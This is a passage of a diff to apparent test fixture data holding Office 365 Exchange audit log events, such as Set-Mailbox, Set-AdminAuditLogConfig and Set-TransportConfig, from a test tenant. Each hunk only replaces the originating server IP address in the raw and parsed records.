bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7a500a7f-cc56-4dfd-d740-08d7ac0f2e45\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2522,7 +2522,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2596,7 +2596,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:10\",\"ExternalAccess\":true,\"Id\":\"6047e3da-8661-44a4-6fd2-08d7ac0f2e85\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2608,7 +2608,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2682,7 +2682,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2694,7 +2694,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2768,7 +2768,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2780,7 +2780,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -2854,7 +2854,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2866,7 +2866,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Force", 
@@ -2928,7 +2928,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -2940,7 +2940,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", 
@@ -2970,7 +2970,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -2982,7 +2982,7 @@
 "Operation": "Set-TransportConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -3008,7 +3008,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 